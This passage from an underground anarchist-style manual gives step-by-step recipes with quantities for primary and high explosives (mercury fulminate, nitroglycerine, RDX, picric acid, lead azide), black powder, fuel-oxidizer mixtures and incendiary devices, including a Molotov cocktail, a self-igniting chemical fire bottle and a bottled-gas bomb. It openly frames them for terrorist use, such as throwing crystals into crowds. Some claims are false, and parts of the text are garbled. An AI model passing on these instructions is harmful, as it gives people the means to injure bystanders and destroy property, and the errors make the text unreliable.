and running away, ammonium nitrate would be formed. After the materials have
stopped reacting, one would simply have to leave the solution in a warm place
until all of the water and any unneutralized ammonia or acid have evaporated.
There would be a fine powder formed, which would be ammonium nitrate. It must
be kept in an airtight container, because of its tendency to pick up water from
the air. The crystals formed in the above process would have to be heated VERY
gently to drive off the remaining water.

Once again, persons reading this material MUST NEVER ATTEMPT TO PRODUCE
These recipes are theoretically correct, meaning that an individual
could conceivably produce the materials described. The methods here are usually
scaled-down industrial procedures.

An explosive is any material that, when ignited by heat or shock,
undergoes rapid decomposition or oxidation. This process releases energy that
is stored in the material in the form of heat and light, or by breaking down
into gaseous compounds that occupy a much larger volume that the original piece
of material. Because this expansion is very rapid, large volumes of air are
displaced by the expanding gasses. This expansion occurs at a speed greater
than the speed of sound, and so a sonic boom occurs. This explains the
mechanics behind an explosion. Explosives occur in several forms: high-order
explosives which detonate, low order explosives, which burn, and primers, which
may do both.
High order explosives detonate. A detonation occurs only in a high
order explosive. Detonations are usually incurred by a shockwave that passes
through a block of the high explosive material. The shockwave breaks apart
the molecular bonds bet
ween the atoms of the substance, at a rate approximately
equal to the speed of sound traveling through that material. In a high
explosive, the fuel and oxodizer are chemically bonded, and the shockwave breaks
apart these bonds, and re-combines the two materials to produce mostly gasses.
T.N.T., ammonium nitrate, and R.D.X. are examples of high order explosives.
Low order explosives do not detonate; they burn, or undergo oxidation.
when heated, the fuel(s) and oxodizer(s) combine to produce heat, light, and
gaseous products. Some low order materials burn at about the same speed under
pressure as they do in the open, such as blackpowder. Others, such as gunpowder,
which is correctly called nitrocellulose, burn much faster and hotter when they
are in a confined space, such as the barrel of a firearm; they usually burn
much slower than blackpowder when they are ignited in unpressurized conditions.
Black powder, nitrocellulose, and flash powder are good examples of low order
Primers are p
eculiarities to the explosive field. Some of them, such as
mercury filminate, will function as a low or high order explosive. They are
usually more sensitive to friction, heat, or shock, than the high or low
explosives. Most primers perform like a high order explosive, except that they
are much more sensitive. Still others merely burn, but when they are confined,
they burn at a great rate and with a large expansion of gasses and a shockwave.
Primers are usually used in a small amount to initiate, or cause to decompose,
a high order explosive, as in an artillery shell. But, they are also frequently
used to ignite a low order explosive; the gunpowder in a bullet is ignited by
the detonation of its primer.

Impact explosives are often used as primers. Of the ones discussed
here, only mercury fulminate and nitroglycerine are real explosives; Ammonium
triiodide crystals decompose upon impact, but they release little heat and no
light. Impact explosives are always treated wi
th the greatest care, and even
the stupidest anarchist never stores them near any high or low explosives.

Ammonium triiodide crystals are foul-smelling purple colored crystals
that decompose under the slightest amount of heat, friction, or shock, if they
are made with the purest ammonia (ammonium hydroxide) and iodine. Such
crystals are said to detonate when a fly lands on them, or when an ant walks
across them. Household ammonia, however, has enough impurities, such as soaps
and abrasive agents, so that the crystals will detonate when thrown,crushed, or

heated. Upon detonation, a loud report is heard, and a cloud of purple iodine
gas appears about the detonation site. Whatever the unfortunate surface that
the crystal was detonated upon will usually be ruined, as some of the iodine
in the crystal is thrown about in a solid form, and iodine is corrosive. It
leaves nasty, ugly, permanent brownish-purple stains on whatever it contacts.
Iodine gas is also bad
news, since it can damage lungs, and it settles to the
ground and stains things there also. Touching iodine leaves brown stains on
the skin that last for about a week, unless they are immediately and vigorously
washed off. While such a compound would have little use to a serious terrorist,
a vandal could utilize them in damaging property. Or, a terrorist could throw
several of them into a crowd as a distraction, an action which would possibly
injure a few people, but frighten almost anyone, since a small crystal that
not be seen when thrown produces a rather loud explosion. Ammonium triiodide
crystals could be produced in the following manner:
Materials Equipment
iodine crystals funnel and filter paper
paper towels
clear ammonia
(ammonium hydroxide, two throw-away glass jars
for the suicidal)

1) Place about two teaspoons of iodine into one of the glass jars. The jars
must bo
th be throw away because they will never be clean again.
2) Add enough ammonia to completely cover the iodine.
3) Place the funnel into the other jar, and put the filter paper in the funnel.
The technique for putting filter paper in a funnel is taught in every basic
chemistry lab class: fold the circular paper in half, so that a semi-circle
is formed. Then, fold it in half again to form a triangle with one curved
side. Pull one thickness of paper out to form a cone, and place the cone
into the funnel.
4) After allowing the iodine to soak in the ammonia for a while, pour the
solution into the paper in the funnel through the filter paper.
5) While the solution is being filtered, put more ammonia into the first jar
to wash any remaining crystals into the funnel as soon as it drains.
6) Collect all the purplish crystals without touching the brown filter paper,
and place them on the paper towels to dry for about an hour. Make sure that
they are not too close to any lights or othe
r sources of heat, as they could
well detonate. While they are still wet, divide the wet material into about
eight chunks.
7) After they dry, gently place the crystals onto a one square inch piece of
duct tape. Cover it with a similar piece, and gently press the duct tape
together around the crystal, making sure not to press the crystal itself.
Finally, cut away most of the excess duct tape with a pair of scissors, and
store the crystals in a cool dry safe place. They have a shelf life of
about a week, and they should be stored in individual containers that can be
thrown away, since they have a tendency to slowly decompose, a process which
gives off iodine vapors, which will stain whatever they settle on. One
possible way to increase their shelf life is to store them in airtight
containers. To use them, simply throw them against any surface or place them
where they will be stepped on or crushed.


Mercury fulminate is perhaps one
of the oldest known initiating
compounds. It can be detonated by either heat or shock, which would make it
of infinite value to a terrorist. Even the action of dropping a crystal of
the fulminate causes it to explode. A person making this material would
probably use the following procedure:

mercury (5 g) glass stirring rod
concentrated nitric 100 ml beaker (2)
acid (35 ml)
adjustable heat
ethyl alcohol (30 ml) source
distilled water blue litmus paper
funnel and filter paper

1) In one beaker, mix 5 g of mercury with 35 ml of concentrated nitric acid,
using the glass rod.
2) Slowly heat the mixture until the mercury is dissolved, which is when the
solution turns green and boils.
3) Place 30 ml of ethyl alcohol into the second beaker, and slowly and carefully
add all of the contents
of the first beaker to it. Red and/or brown fumes
should appear. These fumes are toxic and flammable.
4) After thirty to forty minutes, the fumes should turn white, indicating that
the reaction is near completion. After ten more minutes, add 30 ml of the
distilled water to the solution.
5) Carefully filter out the crystals of mercury fulminate from the liquid
solution. Dispose of the solution in a safe place, as it is corrosive
and toxic.
6) Wash the crystals several times in distilled water to remove as much excess
acid as possible. Test the crystals with the litmus paper until they are
neutral. This will be when the litmus paper stays blue when it touches the
wet crystals
7) Allow the crystals to dry, and store them in a safe place, far away from
any explosive or flammable material.

This procedure can also be done by volume, if the available mercury
cannot be weighed. Simply use 10 volumes of nitric acid and 10 volumes of
ethanol to every one volume of mer

Nitroglycerine is one of the most sensitive explosives, if it is not
the most sensitive. Although it is possible to make it safely, it is difficult.
Many a young anarchist has been killed or seriously injured while trying to
make the stuff. When Nobel's factories make it, many people were killed by the
all-to-frequent factory explosions. Usually, as soon as it is made, it is
converted into a safer substance, such as dynamite. An idiot who attempts
to make nitroglycerine would use the following procedure:

distilled water eye-dropper
table salt 100 ml beaker
sodium bicarbonate 200-300 ml beakers (2)
concentrated nitric ice bath container
acid (13 ml) ( a plastic bucket serves well )
concentrated sulfuric centigrade thermometer
acid (39 ml)
blue litmus paper

1) Plac
e 150 ml of distilled water into one of the 200-300 ml beakers.
2) In the other 200-300 ml beaker, place 150 ml of distilled water and about
a spoonful of sodium bicarbonate, and stir them until the sodium bicarbonate
dissolves. Do not put so much sodium bicarbonate in the water so that some
remains undissolved.
3) Create an ice bath by half filling the ice bath container with ice, and
adding table salt. This will cause the ice to melt, lowering the overall
4) Place the 100 ml beaker into the ice bath, and pour the 13 ml of concentrated
nitric acid into the 100 ml beaker. Be sure that the beaker will not spill
into the ice bath, and that the ice bath will not overflow into the beaker
when more materials are added to it. Be sure to have a large enough ice bath
container to add more ice. Bring the temperature of the acid down to about 20
degrees centigrade or less.
5) When the nitric acid is as cold as stated above, slowly and carefully add the
39 ml of con
centrated sulfuric acid to the nitric acid. Mix the two acids
together, and cool the mixed acids to 10 degrees centigrade. It is a good
idea to start another ice bath to do this.
6) With the eyedropper, slowly put the glycerine into the mixed acids, one drop
at a time. Hold the thermometer along the top of the mixture where the mixed
acids and glycerine meet. DO NOT ALLOW THE TEMPERATURE TO GET ABOVE 30
LIKE HELL!!! The glycerine will start to nitrate immediately, and the
temperature will immediately begin to rise. Add glycerine until there is a
thin layer of glycerine on top of the mixed acids. It is always safest to
make any explosive in small quantities.

7) Stir the mixed acids and glycerine for the first ten minutes of nitration,
adding ice and salt to the ice bath to keep the temperature of the solution
in the 100 ml beaker well below 30 degrees centigrade. Usually, the
ne will form on the top of the mixed acid solution, and the
concentrated sulfuric acid will absorb the water produced by the reaction.
8) When the reaction is over, and when the nitroglycerine is well below 30
degrees centigrade, slowly and carefully pour the solution of nitroglycerine
and mixed acid into the distilled water in the beaker in step 1. The
nitroglycerine should settle to the bottom of the beaker, and the water-acid
solution on top can be poured off and disposed of. Drain as much of the
acid-water solution as possible without disturbing the nitroglycerine.
9) Carefully remove the nitroglycerine with a clean eye-dropper, and place it
into the beaker in step 2. The sodium bicarbonate solution will eliminate
much of the acid, which will make the nitroglycerine more stable, and less
likely to explode for no reason, which it can do. Test the nitroglycerine
with the litmus paper until the litmus stays blue. Repeat this step if
necessary, and use new sodium bicarbo
nate solutions as in step 2.
10) When the nitroglycerine is as acid-free as possible, store it in a clean
container in a safe place. The best place to store nitroglycerine is
far away from anything living, or from anything of any value.
Nitroglycerine can explode for no apparent reason, even if it is stored
in a secure cool place.

Although the procedure for the production of picric acid, or
trinitrophenol has not yet been given, its salts are described first, since they
are extremely sensitive, and detonate on impact. By mixing picric acid with
metal hydroxides, such as sodium or potassium hydroxide, and evaporating the
water, metal picrates can be formed. Simply obtain picric acid, or produce it,
and mix it with a solution of (preferably) potassium hydroxide, of a mid range
molarity. (about 6-9 M) This material, potassium picrate, is impact-sensitive,
and can be used as an initiator for any type of high explosive.
There are
many low-order explosives that can be purchased in gun
stores and used in explosive devices. However, it is possible that a wise
wise store owner would not sell these substances to a suspicious-looking
individual. Such an individual would then be forced to resort to making
his own low-order explosives.


First made by the Chinese for use in fireworks, black powder was first
used in weapons and explosives in the 12th century. It is very simple to make,
but it is not very powerful or safe. Only about 50% of black powder is
converted to hot gasses when it is burned; the other half is mostly very fine
burned particles. Black powder has one major problem: it can be ignited by
static electricity. This is very bad, and it means that the material must be
made with wooden or clay tools. Anyway, a misguided individual could
manufacture black powder at home with the following procedure:

clay grinding bowl
nitrate (75 g) and clay grinder
or or
sodium wooden salad bowl
nitrate (75 g) and wooden spoon
sulfur (10 g) plastic bags (3)
charcoal (15 g) 300-500 ml beaker (1)
distilled water coffee pot or heat source

1) Place a small amount of the potassium or sodium nitrate in the grinding bowl
and grind it to a very fine powder. Do this to all of the potassium or
sodium nitrate, and store the ground powder in one of the plastic bags.
2) Do the same thing to the sulfur and charcoal, storing each chemical in a
separate plastic bag.
3) Place all of the finely ground potassium or sodium nitrate in the beaker, and
add just enough boiling water to the chemical to get it all wet.
4) Add the contents of the other plastic bags to the wet potassium or sodium
nitrate, and mix them well for several minutes. Do this until there is no
more visible s
ulfur or charcoal, or until the mixture is universally black.
5) On a warm sunny day, put the beaker outside in the direct sunlight. Sunlight
is really the best way to dry black powder, since it is never too hot, but it
is hot enough to evaporate the water.
6) Scrape the black powder out of the beaker, and store it in a safe container.
Plastic is really the safest container, followed by paper. Never store black
powder in a plastic bag, since plastic bags are prone to generate static

Nitrocellulose is usually called "gunpowder" or "guncotton". It is more
stable than black powder, and it produces a much greater volume of hot gas. It
also burns much faster than black powder when it is in a confined space.
Finally, nitrocellulose is fairly easy to make, as outlined by the following

cotton (cellulose) two (2) 200-300 ml beakers
oncentrated funnel and filter paper
nitric acid
blue litmus paper
sulfuric acid
distilled water

1) Pour 10 cc of concentrated sulfuric acid into the beaker. Add to this
10 cc of concentrated nitric acid.
2) Immediately add 0.5 gm of cotton, and allow it to soak for exactly 3
3) Remove the nitrocotton, and transfer it to a beaker of distilled water
to wash it in.
4) Allow the material to dry, and then re-wash it.
5) After the cotton is neutral when tested with litmus paper, it is ready to
be dried and stored.

There are nearly an infinite number of fuel-oxodizer mixtures that can
be produced by a misguided individual in his own home. Some are very effective
and dangerous, while others are safer and less effective. A list of working
fuel-oxodizer mixtures will be presented, but the exact measurements of each
compound are debatable for maximum effectiveness.
A rough estimate will be
given of the percentages of each fuel and oxodizer:

oxodizer, % by weight fuel, % by weight speed # notes
potassium chlorate 67% sulfur 33% 5 friction/impact
sensitive; unstable
potassium chlorate 50% sugar 35% 5 fairly slow burning;
charcoal 15% unstable
potassium chlorate 50% sulfur 25% 8 extremely
magnesium or unstable!
aluminum dust 25%
potassium chlorate 67% magnesium or
8 unstable
aluminum dust 33%
sodium nitrate 65% magnesium dust 30% ? unpredictable
sulfur 5% burn rate
potassium permanganate 60% glycerine 40% 4 delay before
ignition depends
potassium permanganate 67% sulfur 33% 5 unstable
potassium permangenate 60% sulfur 20% 5 unstable
magnesium or
aluminum dust 20%
potassium permanganate 50% sugar 50% 3 ?
potassium nitrate 75% charcoal 15% 7 this is
sulfur 10% black powder!
potassium nitrate 60% powdered iron 1 burns very hot
or magnesium 40%

oxidizer, % by weight fuel, % by weight speed # notes
potassium chlorate 75% phosphorus 8 used to make strike-
sesquisulfide 25% anywhere matches
ammonium perchlorate 70% aluminum dust 30% 6 so
lid fuel for
and small amount of space shuttle
iron oxide
potassium perchlorate 67% magnesium or 10 flash powder
(sodium perchlorate) aluminum dust 33%
potassium perchlorate 60% magnesium or 8 alternate
(sodium perchlorate) aluminum dust 20% flash powder
sulfur 20%
barium nitrate 30% aluminum dust 30% 9 alternate
potassium perchlorate 30% flash powder
barium peroxide 90% magnesium dust 5% 10 alternate
um dust 5% flash powder
potassium perchlorate 50% sulfur 25% 8 slightly
magnesium or unstable
aluminum dust 25%
potassium chlorate 67% red phosphorus 27% 7 very unstable
calcium carbonate 3% sulfur 3% impact sensitive
potassium permanganate 50% powdered sugar 25% 7 unstable;
aluminum or ignites if
magnesium dust 25% it gets wet!
potassium chlorate 75% charcoal dust 15% 6 unstable
sulfur 10%
NOTE: Mixtures that uses substitutions of sodium perchlorate for potassium
perchlorate become moisture-absorbent and less stable.
The higher the speed number, the faster the fuel-oxodizer mixture burns
AFTER ignition. Also, as a rule, the finer the powder, the faster the rate of
As one can easily see, there is a wide variety of fuel-oxodizer mixtures
that can be made at home. By altering the amounts of fuel and oxodizer(s),
different burn rates can be achieved, but this also can change the sensitivity
of the mixture.

As a rule, any oxidizable material that is treated with perchloric acid
will become a low order explosive. Metals, however, such as potassium or
sodium, become excellent bases for flash-type powders. Some materials that can
be perchlorated are cotton, paper, and sawdust. To produce potassium or sodium
perchlorate, simply acquire the
hydroxide of that metal, e.g. sodium or
potassium hydroxide. It is a good idea to test the material to be perchlorated
with a very small amount of acid, since some of the materials tend to react
explosively when contacted by the acid. Solutions of sodium or potassium
hydroxide are ideal.

High order explosives can be made in the home without too much
difficulty. The main problem is acquiring the nitric acid to produce the high
explosive. Most high explosives detonate because their molecular structure is
made up of some fuel and usually three or more NO2 ( nitrogen dioxide )
molecules. T.N.T., or Tri-Nitro-Toluene is an excellent example of such a
material. When a shock wave passes through an molecule of T.N.T., the
nitrogen dioxide bond is broken, and the oxygen combines with the fuel, all in
a matter of microseconds. This accounts for the great power of nitrogen-based
explosives. Remembering that these procedures are NEVER TO BE CARRIED OUT,
several methods of
manufacturing high-order explosives in the home are listed.

3.31 R.D.X.
R.D.X., also called cyclonite, or composition C-1 (when mixed with
plasticisers) is one of the most valuable of all military explosives. This is
because it has more than 150% of the power of T.N.T., and is much easier to
detonate. It should not be used alone, since it can be set off by a not-too
severe shock. It is less sensitive than mercury fulminate, or nitroglycerine,
but it is still too sensitive to be used alone. R.D.X. can be made by the
surprisingly simple method outlined hereafter. It is much easier to make in the
home than all other high explosives, with the possible exception of ammonium

hexamine 500 ml beaker
methenamine glass stirring rod
fuel tablets (50 g)
funnel and filter paper
nitric acid
(550 ml) ice bath container
(plastic bucket)
distilled water
centigrade thermometer
table salt
blue litmus paper
ammonium nitrate
1) Place the beaker in the ice bath, (see section 3.13, steps 3-4) and carefully
pour 550 ml of concentrated nitric acid into the beaker.
2) When the acid has cooled to below 20 degrees centigrade, add small amounts of
the crushed fuel tablets to the beaker. The temperature will rise, and it
must be kept below 30 degrees centigrade, or dire consequences could result.
Stir the mixture.
3) Drop the temperature below zero degrees centigrade, either by adding more ice
and salt to the old ice bath, or by creating a new ice bath. Or, ammonium
nitrate could be added to the old ice bath, since it becomes cold when it is
put in water. Continue stirring the mixture, keeping the temperature below
zero degrees centigrade for at le
ast twenty minutes

4) Pour the mixture into a litre of crushed ice. Shake and stir the mixture,
and allow it to melt. Once it has melted, filter out the crystals, and
dispose of the corrosive liquid.
5) Place the crystals into one half a litre of boiling distilled water. Filter
the crystals, and test them with the blue litmus paper. Repeat steps 4 and 5
until the litmus paper remains blue. This will make the crystals more stable
and safe.
6) Store the crystals wet until ready for use. Allow them to dry completely
using them. R.D.X. is not stable enough to use alone as an explosive.
7) Composition C-1 can be made by mixing 88.3% R.D.X. (by weight) with 11.1%
mineral oil, and 0.6% lecithin. Kneed these material together in a plastic
bag. This is a good way to desensitize the explosive.
8) H.M.X. is a mixture of T.N.T. and R.D.X.; the ratio is 50/50, by weight.
it is not as sensitive, and is almost as powerful as straight R.D.X.
9) By adding ammonium nitrate to the crys
tals of R.D.X. after step 5, it should
be possible to desensitize the R.D.X. and increase its power, since ammonium
nitrate is very insensitive and powerful. Soduim or potassium nitrate could
also be added; a small quantity is sufficient to stabilize the R.D.X.
10) R.D.X. detonates at a rate of 8550 meters/second when it is compressed to a
density of 1.55 g/cubic cm.

Ammonium nitrate could be made by a terrorist according to the hap-
hazard method in section 2.33, or it could be stolen from a construction site,
since it is usually used in blasting, because it is very stable and insensitive
to shock and heat. A terrorist could also buy several Instant Cold-Paks from a
drug store or medical supply store. The major disadvantage with ammonium
nitrate, from a terrorist's point of view, would be detonating it. A rather
powerful priming charge must be used, and usually with a booster charge. The
diagram below will explain.
| | |
________| | |
| | T.N.T.| ammonium nitrate |
|primer |booster| |
|_______| | |
| | |
The primer explodes, detonating the T.N.T., which detonates, sending
a tremendous shockwave through the ammonium nitrate, detonating it.

3.33 ANFOS
ANFO is an acronym for Ammonium Nitrate - Fuel Oil Solution. An ANFO
solves the only other major problem with ammonium nitrate: its tendency to pick
up water vapor from the air. This results in the explosive failing to detonate
when such an attempt is made. This is rectified by mixing 94% (by weight)
ammonium nitrate with 6% fuel oil, or kerosene. The kerosene keeps the ammonium
nitrate from absorbing moisture from the air. An ANFO also requires a large
shockwave to s
et it off.

3.34 T.N.T.

T.N.T., or Tri-Nitro-Toluene, is perhaps the second oldest known high
explosive. Dynamite, of course, was the first. It is certainly the best known
high explosive, since it has been popularized by early morning cartoons. It
is the standard for comparing other explosives to, since it is the most well
known. In industry, a T.N.T. is made by a three step nitration process that is
designed to conserve the nitric and sulfuric acids which are used to make the
product. A terrorist, however, would probably opt for the less economical one
step method. The one step process is performed by treating toluene with very
strong (fuming) sulfuric acid. Then, the sulfated toluene is treated with very
strong (fuming) nitric acid in an ice bath. Cold water is added the solution,
and it is filtered.


Potassium chlorate itself cannot be made in the home, but it can be
obtained from labs. If potassium chlorate is mixed with a small amount of
vaseline, or
other petroleum jelly, and a shockwave is passed through it, the
material will detonate with slightly more power than black powder. It must,
however, be confined to detonate it in this manner. The procedure for making
such an explosive is outlined below:


potassium chlorate zip-lock plastic bag
(9 parts, by volume)
petroleum jelly clay grinding bowl
(vaseline) or
(1 part, by volume) wooden bowl and wooden spoon

1) Grind the potassium chlorate in the grinding bowl carefully and slowly,
until the potassium chlorate is a very fine powder. The finer that it is
powdered, the faster (better) it will detonate.
2) Place the powder into the plastic bag. Put the petroleum jelly into the
plastic bag, getting as little on the sides of the bag as possible, i.e.
put the vaseline on the potassium chlorate powder.
3) Close
the bag, and kneed the materials together until none of the potassium
chlorate is dry powder that does not stick to the main glob. If necessary,
add a bit more petroleum jelly to the bag.
4) The material must me used within 24 hours, or the mixture will react to
greatly reduce the effectiveness of the explosive. This reaction, however,
is harmless, and releases no heat or dangerous products.

The name dynamite comes from the Greek word "dynamis", meaning power.
Dynamite was invented by Nobel shortly after he made nitroglycerine. It was
made because nitroglycerine was so dangerously sensitive to shock. A misguided
individual with some sanity would, after making nitroglycerine (an insane act)
would immediately convert it to dynamite. This can be done by adding various
materials to the nitroglycerine, such as sawdust. The sawdust holds a large
weight of nitroglycerine per volume. Other materials, such as ammonium nitrate
could be added, and they would tend to d
esensitize the explosive, and increase
the power. But even these nitroglycerine compounds are not really safe.


Nitrostarch explosives are simple to make, and are fairly powerful. All
that need be done is treat various starches with a mixture of concentrated nitric
and sulfuric acids. 10 ml of concentrated sulfuric acid is added to 10 ml of
concentrated nitric acid. To this mixture is added 0.5 grams of starch. Cold
water is added, and the apparently unchanged nitrostarch is filtered out.
Nitrostarch explosives are of slightly lower power than T.N.T., but they are
more readily detonated.


Picric acid, also known as Tri-Nitro-Phenol, or T.N.P., is a military
explosive that is most often used as a booster charge to set off another less
sensitive explosive, such as T.N.T. It another explosive that is fairly simple
to make, assuming that one can acquire the concentrated sulfuric and nitric
acids. Its procedure for manufacture is given i
n many college chemistry lab
manuals, and is easy to follow. The main problem with picric acid is its
tendency to form dangerously sensitive and unstable picrate salts, such as
potassium picrate. For this reason, it is usually made into a safer form, such
as ammonium picrate, also called explosive D. A social deviant would probably
use a formula similar to the one presented here to make picric acid.

phenol (9.5 g) 500 ml flask
concentrated adjustable heat source
sulfuric acid (12.5 ml)
1000 ml beaker
concentrated nitric or other container
acid (38 ml) suitable for boiling in
distilled water filter paper
and funnel
glass stirring rod

1) Place 9.5 grams of pheno
l into the 500 ml flask, and carefully add 12.5
ml of concentrated sulfuric acid and stir the mixture.
2) Put 400 ml of tap water into the 1000 ml beaker or boiling container and
bring the water to a gentle boil.
3) After warming the 500 ml flask under hot tap water, place it in the boiling
water, and continue to stir the mixture of phenol and acid for about thirty
minutes. After thirty minutes, take the flask out, and allow it to cool for
about five minutes.
4) Pour out the boiling water used above, and after allowing the container to
cool, use it to create an ice bath, similar to the one used in section 3.13,
steps 3-4. Place the 500 ml flask with the mixed acid an phenol in the ice
bath. Add 38 ml of concentrated nitric acid in small amounts, stirring the
mixture constantly. A vigorous but "harmless" reaction should occur. When
the mixture stops reacting vigorously, take the flask out of the ice bath.
5) Warm the ice bath container, if it is glass, and then begin boil
ing more tap
water. Place the flask containing the mixture in the boiling water, and heat
it in the boiling water for 1.5 to 2 hours.
6) Add 100 ml of cold distilled water to the solution, and chill it in an ice
bath until it is cold.
7) Filter out the yellowish-white picric acid crystals by pouring the solution
through the filter paper in the funnel. Collect the liquid and dispose of it
in a safe place, since it is corrosive.
8) Wash out the 500 ml flask with distilled water, and put the contents of the
filter paper in the flask. Add 300 ml of water, and shake vigorously.
9) Re-filter the crystals, and allow them to dry.
10) Store the crystals in a safe place in a glass container, since they will
react with metal containers to produce picrates that could explode


Ammonium picrate, also called Explosive D, is another safety explosive.
It requires a substantial shock to cause it to detonate, slightly less than that
required to d
etonate ammonium nitrate. It is much safer than picric acid, since
it has little tendency to form hazardous unstable salts when placed in metal
containers. It is simple to make from picric acid and clear household ammonia.
All that need be done is put the picric acid crystals into a glass container and
dissolve them in a great quantity of hot water. Add clear household ammonia in
excess, and allow the excess ammonia to evaporate. The powder remaining should
be ammonium picrate.


Nitrogen trichloride, also known as chloride of azode, is an oily yellow
liquid. It explodes violently when it is heated above 60 degrees celsius, or
when it comes in contact with an open flame or spark. It is fairly simple to

1) In a beaker, dissolve about 5 teaspoons of ammonium nitrate in water.
Do not put so much ammonium nitrate into the solution that some of it
remains undissolved in the bottom of the beaker.
2) Collect a quantity of chlorine gas in a second bea
ker by mixing hydrochloric
acid with potassium permanganate in a large flask with a stopper and glass
3) Place the beaker containing the chlorine gas upside down on top of the
beaker containing the ammonium nitrate solution, and tape the beakers
together. Gently heat the bottom beaker. When this is done, oily yellow
droplets will begin to form on the surface of the solution, and sink down
to the bottom. At this time, remove the heat source immediately.
Alternately, the chlorine can be bubbled through the ammonium nitrate
solution, rather than collecting the gas in a beaker, but this requires
timing and a stand to hold the beaker and test tube.
The chlorine gas can also be mixed with anhydrous ammonia gas, by gently
heating a flask filled with clear household ammonia. Place the glass tubes
from the chlorine-generating flask and the tube from the ammonia-generating
flask in another flask that contains water.
4) Collect the yellow droplets with
an eyedropper, and use them immediately,
since nitrogen trichloride decomposes in 24 hours.

Lead Azide is a material that is often used as a booster charge for
other explosive, but it does well enough on its own as a fairly sensitive
explosive. It does not detonate too easily by percussion or impact, but it
is easily detonated by heat from an igniter wire, or a blasting cap. It is
simple to produce, assuming that the necessary chemicals can be procured.
By dissolving sodium azide and lead acetate in water in separate
beakers, the two materials are put into an aqueous state. Mix the two beakers
together, and apply a gentle heat. Add an excess of the lead acetate
solution, until no reaction occurs, and the precipitate on the bottom of the
beaker stops forming. Filter off the solution, and wash the precipitate in
hot water. The precipitate is lead azide, and it must be stored wet for safety.
If lead acetate cannot be found, simply acquire acetic acid, and put lead
in it. Black powder bullets work well for this purpose.

The remaining section covers the other types of materials that can
be used to destroy property by fire. Although none of the materials
presented here are explosives, they still produce explosive-style results.
Thermit is a fuel-oxodizer mixture that is used to generate tremendous
amounts of heat. It was not presented in section 3.23 because it does not react
nearly as readily. It is a mixture of iron oxide and aluminum, both finely
powdered. When it is ignited, the aluminum burns, and extracts the oxygen from
the iron oxide. This is really two very exothermic reactions that produce a
combined temperature of about 2200 degrees C. This is half the heat produced by
an atomic weapon. It is difficult to ignite, however, but when it is ignited,
it is one of the most effective firestarters around.

powdered aluminum (10 g)
powdered iron oxide (10 g)

1) Th
ere is no special procedure or equipment required to make thermit. Simply
mix the two powders together, and try to make the mixture as hom*ogenous as
possible. The ratio of iron oxide to aluminum is 50% / 50% by weight, and
be made in greater or lesser amounts.
2) Ignition of thermite can be accomplished by adding a small amount of
potassium chlorate to the thermit, and pouring a few drops of sulfuric acid
on it. This method and others will be discussed later in section 4.33. The
other method of igniting thermit is with a magnesium strip. Finally, by
using common sparkler-type fireworks placed in the thermit, the mixture
can be ignited.


First used by Russians against German tanks, the Molotov co*cktail is now
exclusively used by terrorists worldwide. They are extremely simple to make, and
can produce devastating results. By taking any highly flammable material, such
as gasoline, diesel fuel, kerosene, ethyl or methyl alcohol, lighter fluid,
ntine, or any mixture of the above, and putting it into a large glass
bottle, anyone can make an effective firebomb. After putting the flammable
liquid in the bottle, simply put a piece of cloth that is soaked in the liquid
in the top of the bottle so that it fits tightly. Then, wrap some of the cloth
around the neck and tie it, but be sure to leave a few inches of lose cloth to
light. Light the exposed cloth, and throw the bottle. If the burning cloth
does not go out, and if the bottle breaks on impact, the contents of the bottle
will spatter over a large area near the site of impact, and burst into flame.
Flammable mixtures such as kerosene and motor oil should be mixed with a more
volatile and flammable liquid, such as gasoline, to insure ignition. A mixture
such as tar or grease and gasoline will stick to the surface that it strikes,
and burn hotter, and be more difficult to extinguish. A mixture such as this
must be shaken well before it is lit and thrown

The chemic
al fire bottle is really an advanced molotov co*cktail. Rather
than using the burning cloth to ignite the flammable liquid, which has at best
a fair chance of igniting the liquid, the chemical fire bottle utilizes the very
hot and violent reaction between sulfuric acid and potassium chlorate. When the
container breaks, the sulfuric acid in the mixture of gasoline sprays onto the
paper soaked in potassium chlorate and sugar. The paper, when struck by the
acid, instantly bursts into a white flame, igniting the gasoline. The chance
of failure to ignite the gasoline is less than 2%, and can be reduced to 0%, if
there is enough potassium chlorate and sugar to spare.

potassium chlorate glass bottle
(2 teaspoons) (12 oz.)
sugar (2 teaspoons) cap for bottle,
with plastic inside
cooking pan with raised
sulfuric acid (4 oz.) edges
gasoline (8 oz.) paper towels
glass or plastic cup
and spoon

1) Test the cap of the bottle with a few drops of sulfuric acid to make sure
that the acid will not eat away the bottle cap during storage. If the
acid eats through it in 24 hours, a new top must be found and tested, until
a cap that the acid does not eat through is found. A glass top is excellent.
2) Carefully pour 8 oz. of gasoline into the glass bottle.
3) Carefully pour 4 oz. of concentrated sulfuric acid into the glass bottle.
Wipe up any spills of acid on the sides of the bottle, and screw the cap on
the bottle. Wash the bottle's outside with plenty of water. Set it aside
to dry.
4) Put about two teaspoons of potassium chlorate and about two teaspoons of
sugar into the glass or plastic cup. Add about 1/2 cup of boiling water,
or enough
to dissolve all of the potassium chlorate and sugar.
5) Place a sheet of paper towel in the cooking pan with raised edges. Fold
the paper towel in half, and pour the solution of dissolved potassium
chlorate and sugar on it until it is thoroughly wet. Allow the towel to
6) When it is dry, put some glue on the outside of the glass bottle containing
the gasoline and sulfuric acid mixture. Wrap the paper towel around the
bottle, making sure that it sticks to it in all places. Store the bottle
in a place where it will not be broken or tipped over.
7) When finished, the solution in the bottle should appear as two distinct
liquids, a dark brownish-red solution on the bottom, and a clear solution
on top. The two solutions will not mix. To use the chemical fire bottle,
simply throw it at any hard surface.
9) To test the device, tear a small piece of the paper towel off the bottle,
and put a few drops of sulfuric acid on it. The paper towel should
immediately burst into a white flame.


Bottled gas, such as butane for refilling lighters, propane for propane
stoves or for bunsen burners, can be used to produce a powerful explosion. To
make such a device, all that a simple-minded anarchist would have to do would be
to take his container of bottled gas and place it above a can of Sterno or other
gelatinized fuel, and light the fuel and run. Depending on the fuel used, and
on the thickness of the fuel container, the liquid gas will boil and expand to
the point of bursting the container in about five minutes. In theory, the gas
would immediately be ignited by the burning gelatinized fuel, producing a large
fireball and explosion. Unfortunately, the bursting of the bottled gas container
often puts out the fuel, thus preventing the expanding gas
from igniting. By
using a metal bucket half filled with gasoline, however, the chances of ignition
are better, since the gasoline is less likely to be extinguished. Placing the
canister of bottled gas on a bed of burning charcoal soaked in gasoline would
probably be the most effective way of securing ignition of the expanding gas,
since although the bursting of the gas container may blow out the flame of the
gasoline, the burning charcoal should immediately re-ignite it. Nitrous oxide,
hydrogen, propane, acetylene, or any other flammable gas will do nicely.


Once a terrorist has made his explosives, the next logical step is to
apply them. Explosives have a wide range of uses, from harassment, to vandalism,
